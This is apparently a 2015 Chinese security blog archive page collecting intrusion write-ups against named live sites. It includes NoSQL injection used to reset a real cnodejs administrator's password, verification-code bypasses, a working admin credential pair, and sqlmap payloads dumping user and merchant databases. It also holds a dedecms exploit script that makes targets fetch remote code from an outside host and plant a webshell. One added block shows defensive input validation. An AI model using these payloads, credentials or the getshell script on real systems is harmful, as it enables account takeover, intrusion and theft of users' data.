Monthly archive: July 2015

nodeclub injection vulnerability allows resetting user passwords

Probably not many people use nodeclub (https://github.com/cnodejs/nodeclub/); just for fun, I downloaded the nodeclub source from GitHub. In controllers/sign.js:

  exports.reset_pass = function (req, res, next) {
    var key = req.query.key;
    var name = req.query.name;
    User.getUserByNameAndKey(name, key, function (err, user) {
      if (!user) {
        res.status(403);
        return res.render('notify/notify', {error: '信息有误,密码无法重置。'});
      }
      // ... (remainder of the handler omitted in the post)

As you can see, key and name are passed into User.getUserByNameAndKey without any validation. In proxy/user.js:
exports.getUserByNameAndKey = function (loginname, key, callback) {
  User.findOne({loginname: loginname, retrieve_key: key}, callback);
};
To test this issue, we first pick as the target one of the cnodejs administrators, alsotang; from his GitHub you can see that his e-mail is alsotang@gmail.com. Then request a password reset at https://cnodejs.org/search_pass.

Next, given the problem above, it is easy to construct the following request: https://cnodejs.org/reset_pass?name=alsotang&key[$ne]=111111111 Here name is the target username and key is constrained to be "not equal to" the supplied value; a normal page is returned.

If instead we set key to some arbitrary value, e.g. https://cnodejs.org/reset_pass?name=alsotang&key=111111111 an error page is returned:

This means we can blind-inject the key parameter through $regex. For example:
https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^5 returns the normal page
https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^6 returns the error page
https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^5f returns the normal page
...
Test code: see the "test code" section. After running the program,

the key that was recovered:

Then use the key to reset the password; it was reset to wooyun, and after logging in~~

See the profile at https://cnodejs.org/user/alsotang.
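A hardened form of the lookup above, as an added example that is not nodeclub's own code: it refuses the operator objects that Express's query parser produces for `key[$ne]=...` and `name[$regex]=...`, so only primitive strings ever reach the Mongoose query. `userModel` stands in for the Mongoose User model, and the sample query objects are constructed to mirror the request shapes in the post.

```javascript
'use strict';
// Added example (not nodeclub's own code). Express's extended query parser
// turns "?key[$ne]=1" into { key: { $ne: '1' } }, and Mongoose forwards such
// an object to MongoDB as a query operator. The fix: accept plain strings only.

// True only for a non-empty primitive string (objects and arrays are rejected).
function isPlainString(v) {
  return typeof v === 'string' && v.length > 0;
}

// Builds the filter for User.findOne, or returns null when either parameter
// is not a plain string (an operator object, an array, undefined, ...).
function buildResetFilter(query) {
  if (!isPlainString(query.name) || !isPlainString(query.key)) {
    return null;
  }
  return { loginname: query.name, retrieve_key: query.key };
}

// Drop-in replacement for the getUserByNameAndKey proxy. userModel stands in
// for the Mongoose User model (assumption: it exposes findOne(filter, cb)).
function getUserByNameAndKey(userModel, loginname, key, callback) {
  const filter = buildResetFilter({ name: loginname, key: key });
  if (filter === null) {
    // Treated exactly like "no such user": the handler then renders the 403 page,
    // and the database is never asked an attacker-shaped question.
    return callback(null, null);
  }
  userModel.findOne(filter, callback);
}

// Constructed inputs: what Express produces for the three request shapes
// discussed in the post (plain key, key[$ne]=..., name[$regex]=...).
const SAMPLE_QUERIES = [
  { name: 'someuser', key: '111111111' },
  { name: 'someuser', key: { $ne: '111111111' } },
  { name: { $regex: '^some' }, key: { $regex: '^5' } },
];

// Returns 'lookup' for queries that would reach the database and 'rejected'
// for those stopped by the type check.
function classify(queries) {
  return queries.map((q) => (buildResetFilter(q) === null ? 'rejected' : 'lookup'));
}

console.log(classify(SAMPLE_QUERIES)); // [ 'lookup', 'rejected', 'rejected' ]
```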


Logic flaw on a 我爱我家 (5i5j) sub-site allows logging in as any user and registering any phone number

我爱我家 official site:
1. The phone verification-code login lets you log in as the user of any phone number; the client receives the verification code directly.
2. Any number can be registered; the client receives the verification code directly.

1. Phone verification-code login, logging in as the user of any phone number. Address: http://hz.5i5j.com/regLogin/phoneLogin

Enter any phone number, fill in the image captcha, and intercept the request with a proxy:

Enter the SMS verification code 271531; login succeeds.

2. Registration with any number; the client receives the verification code directly. Address: http://hz.5i5j.com/regLogin/register

Click "get verification code", enter the image captcha, and intercept the request with a proxy:

Enter the verification code; registration succeeds.

Fix:
Verify the verification code on the server side; as it stands the login module is effectively useless.

How I bypassed Google authentication on the Periscope admin panel

Periscope is an iOS/Android app owned by Twitter, used mainly for live streaming. It manages millions of users through a web-based admin panel, which you can find by visiting admin.periscope.tv.

When you browse the site, every request is redirected to /auth?redirect=/ (because we do not have a valid session), which in turn redirects to Google authentication.


Enabling Onion (洋葱) QR-code login or token-based login for WordPress

Recently, 游侠安全网 has published several articles introducing "Onion" (洋葱), not the edible kind but the latest startup project of DNSPod founder Wu Hongsheng: a piece of software that hardens passwords and also makes the act of "swiping" in your password look a lot cooler.

So, as a webmaster, I (网路游侠) very much wanted to try it out, and today I spent a little time (only about 5 minutes; a second configuration would take about 3) integrating Onion login into www.youxia.org, which is built on WordPress. Here is the process:


Ziroom Youjia (自如友家) property configuration system work orders leak information

The property configuration system's work orders leak information (property number, contract number, property address, contract signing time), and the order IDs can be enumerated. How serious it would be for this information to fall into competitors' hands needs no explanation.

http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459130

http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459230

http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459330


Weak admin password on a 55bbs (我爱网) site leads to back-end SQL injection exposing merchant information

Admin back-end address:
http://admin.55bbs.com/login.php

The weak credentials lijun / lijun123 get you straight in.

Request captured from a search function in the back end:

POST /adpublish/customer_list.php HTTP/1.1
Host: article.55bbs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://article.55bbs.com/adpublish/customer_list.php
Cookie: ID=320; S_uid=lijun; S_checkcode=c7c0d53884ee86346f5dc0d9d27b7e5e; S_power_limit=N
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
text=&workname=nixiaolei&select8=1&button=%B2%E9%D1%AF

Testing shows the select8 parameter is the injection point.

Feed it straight to sqlmap:
Parameter: select8 (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: text=&workname=nixiaolei&select8=1 AND 7097=7097&button=%B2%E9%D1%AF
    Type: UNION query
    Title: MySQL UNION query (33) - 11 columns
    Payload: text=&workname=nixiaolei&select8=1 UNION ALL SELECT 33,33,33,33,CONCAT(0x716b627a71,0x48654a5270764e595443,0x717a786a71),33,33,33,33,33,33#&button=%B2%E9%D1%AF

[16:37:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
There are 3 databases.
available databases [3]:
[*] Admanger
[*] information_schema
[*] test

Quite a lot of tables, 429 in all, some of them holding important merchant information.
Database: Admanger
[429 tables]


dedecms remote code execution exploit script

  #! /usr/bin/env python
  #coding=utf-8
  #Joseph(小续)

  import requests
  import sys
  import re

  def main():
      try:
          url = "http://" + sys.argv[1].strip('http://')
      except IndexError:
          print '''
          poc: dede.py http://www.baidu.com/
          '''
          # no target given: stop here instead of failing on an undefined url
          return
      payload = "/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
      urlpoc = url + payload
      code = requests.get(urlpoc).status_code
      if code == 200:
          print u"恭喜存在此漏洞"
          print u"Ongoing attacks--->>>>>"
          exploit(url)
      else:
          print u"sorry 漏洞正在挣扎"

  def exploit(url):
      urlpoc = url + "/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=http://www.mrjking.com/"
      htmlcontent = requests.get(urlpoc).content
      # the response contains '存在' when the remote file was fetched and written
      Probe = re.compile(r'存在')
      if Probe.findall(htmlcontent):
          print u'''
          ver:getshell成功
          shell:url+/data/tang3.php?a=0  密码为:c
          '''
      else:
          print u"请看远程地址是否已经不可用"

  if __name__ == '__main__':
      main()


Multiple SQL injections on the zhuaxia.com main site


First: URL: http://www.zhuaxia.com/php_controller/myFeedController.php?action=channelInfo&chid=833&customerId=29034823&lastid=0&show_all_item=1&sourceid=0&stamp=0.09998915647156537&version=200812241245
Vulnerable parameter: chid
Payloads:
1. boolean-based blind: AND 1=1, AND 1=2
2. time-based blind: AND sleep(XX)
This is a string-type injection.

Second: URL: http://www.zhuaxia.com/register_check.php?logId=165
POST parameters: blog_url=1&code=94102&do_reg=1&email=test%40email.com&ivc=ARkGQlYUBxw%3d&nickname=1&password=g00dPa%24%24w0rD&password_second=g00dPa%24%24w0rD
Vulnerable parameter: email
Error-based injection payload: ' and select XXX from (select concat(xx) from ionfromation.XX ) and 'a'='a
Error display should be turned off here first.

available databases [10]:
[*] dba
[*] information_schema
[*] mysql
[*] percona
[*] performance_schema
[*] test
[*] tudui
[*] wordpress
[*] wordpress_mu
[*] XiaoNei

The tudui database here is an important one containing a large number of tables; the data from the first five of them was dumped, as shown in the figure below:

This is a user information table; only the field list is shown in the screenshot as an example, and the data that follows was not captured. Then I took a look at the XiaoNei database.

You can see there are more than 9.15 million user records; the first five rows are shown as an example.
